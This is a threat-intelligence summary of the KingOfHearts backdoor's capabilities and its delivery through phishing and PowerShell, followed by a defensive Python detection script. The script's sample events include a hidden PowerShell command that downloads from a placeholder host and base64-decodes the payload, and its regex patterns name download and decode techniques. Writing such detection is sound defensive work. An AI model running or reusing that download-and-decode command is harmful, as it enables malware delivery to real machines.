KingOfHearts is a backdoor written in C++ that belongs to the toolset of an unnamed, sophisticated threat actor. The same group has been observed using three different malware families in its operations. One of them, SlothfulMedia, was the subject of a report published by the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA).
At its core, KingOfHearts offers the basic functions expected from a backdoor, without anything too fancy. It does include a custom utility for capturing screenshots, though. Beyond that, it can execute commands on the compromised computer, list the running processes and terminate any of them, and manipulate the file system.
KingOfHearts is most likely distributed through phishing emails carrying weaponized Word document attachments. Once executed, these documents launch a PowerShell script that downloads an image carrying a base64-encoded malware payload. KingOfHearts has been observed being dropped as either a '.exe' or a '.dll' file. Communication with the Command-and-Control (C2, C&C) infrastructure takes place over HTTP(S).
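As an added example (not from the original report or from the malware's authors), the following Python detection logic flags the execution chain just described, a Word process spawning PowerShell that fetches an image and base64-decodes a payload, over constructed process-creation events. The process-name sets, the indicator patterns and the sample command lines are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Office programs that rarely have a legitimate reason to spawn a shell, and the
# shells to watch (both sets are assumptions for this example).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line indicators for the chain described above: PowerShell fetching an
# image file and base64-decoding a payload out of it.
PATTERNS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "image_url": re.compile(r"https?://\S+?\.(?:png|jpe?g|gif|bmp)\b", re.I),
    "base64_decode": re.compile(r"frombase64string|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

@dataclass
class ProcEvent:            # one process-creation record (Sysmon event 1 style)
    pid: int
    parent_image: str       # full path of the parent process
    image: str              # full path of the new process
    command_line: str

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def indicators(ev):
    """Names of the indicators one event matches; empty unless the child is a shell."""
    if _basename(ev.image) not in SHELLS:
        return []
    hits = ["office_parent"] if _basename(ev.parent_image) in OFFICE_PARENTS else []
    hits += [name for name, rx in PATTERNS.items() if rx.search(ev.command_line)]
    return hits

def detect(events):
    """Map pid -> (severity, hits): Office parent alone is 'medium', with download + decode 'high'."""
    alerts = {}
    for ev in events:
        hits = indicators(ev)
        if "office_parent" in hits:
            high = {"download", "base64_decode"} <= set(hits)
            alerts[ev.pid] = ("high" if high else "medium", hits)
    return alerts

# Constructed sample telemetry (not real logs); the URL is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    ProcEvent(4412, WORD, PS, "powershell.exe -w hidden -c \"[Convert]::FromBase64String("
              "(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/pic.png'))\""),
    ProcEvent(4420, r"C:\Windows\explorer.exe", PS, "powershell.exe -c Get-ChildItem C:\\Users"),
    ProcEvent(4431, WORD, PS, "powershell.exe -c Write-Output done"),
]
```

Running `detect(SAMPLE_EVENTS)` rates the first event high, ignores the explorer-spawned shell, and rates the third medium, which is the triage split a SOC would want between a plain Office-to-shell anomaly and the full download-and-decode chain.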
According to the researchers who analyzed it, KingOfHearts is equipped with anti-debugging and virtualization-detection functionality.